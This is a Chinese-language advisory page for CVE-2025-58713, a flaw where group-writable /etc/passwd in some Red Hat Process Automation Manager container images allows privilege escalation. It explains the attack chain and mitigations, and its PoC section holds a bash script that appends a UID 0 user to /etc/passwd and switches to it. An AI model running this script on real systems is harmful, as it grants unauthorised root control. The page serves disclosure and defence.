CVE-2025-58713 CVSS 6.4 中危

CVE-2025-58713 Red Hat容器权限提升漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-58713

漏洞类型

权限提升

CVSS评分

6.4 中危

攻击向量

本地 (AV:L)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Red Hat Process Automation Manager

漏洞概述

该漏洞存在于Red Hat Process Automation Manager的特定容器镜像中，属于容器权限提升漏洞。问题根源在于构建阶段/etc/passwd文件被赋予了组可写权限。若攻击者能以非root用户身份在容器内执行命令，且属于root组，即可利用该权限篡改/etc/passwd文件，添加任意UID（包括0）的用户，从而获取容器内的完全root控制权。

技术细节

该漏洞属于典型的容器安全配置不当导致的权限提升。其技术原理在于Linux系统对/etc/passwd文件的访问控制机制失效。受影响的Red Hat镜像在构建时，未正确限制/etc/passwd文件的写入权限，导致其变为“组可写”。在特定场景下，如果攻击者能够进入容器内部（例如通过Web漏洞或SSH），且其当前用户账号隶属于root组（GID 0），便利用该权限缺陷。攻击者可以通过echo等命令向/etc/passwd文件追加一行恶意的用户记录，创建一个拥有UID 0的新账户。由于Linux内核以UID 0鉴别最高权限，该新账户无需密码即可切换为root用户，从而完全控制容器环境。

攻击链分析

STEP 1

获取初始访问

攻击者通过某种方式获得容器内的非root用户Shell访问权限，且该用户属于root组。

STEP 2

识别漏洞条件

攻击者检查/etc/passwd文件的权限，确认其为组可写（Group-writable）。

STEP 3

篡改用户文件

攻击者利用写入权限，向/etc/passwd文件追加一行数据，创建一个UID为0的新用户。

STEP 4

获取Root权限

攻击者切换至新创建的用户，由于UID为0，直接获得容器内的完整root权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# PoC for CVE-2025-58713: Container Privilege Escalation via /etc/passwd
# This script checks for group-writable /etc/passwd and attempts to add a root user.

if [ -w /etc/passwd ]; then
    echo "[+] /etc/passwd is writable. Exploiting..."
    # Append a new user with UID 0 (root privileges)
    # Format: username:password:UID:GID:gecos:home:shell
    echo "attacker:x:0:0:root:/root:/bin/bash" >> /etc/passwd
    echo "[+] User 'attacker' added with UID 0."
    # Attempt to switch to the new root user
    su attacker
else
    echo "[-] /etc/passwd is not writable or permission denied."
fi

影响范围

Red Hat Process Automation Manager (Specific affected images)

防御指南

临时缓解措施

临时缓解措施包括：立即检查并修正容器内/etc/passwd文件的权限，确保其不可被组写入；限制容器运行时的特权，尽量避免以root组用户运行应用；利用文件系统只读挂载或安全模块（如SELinux）防止关键文件被篡改。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表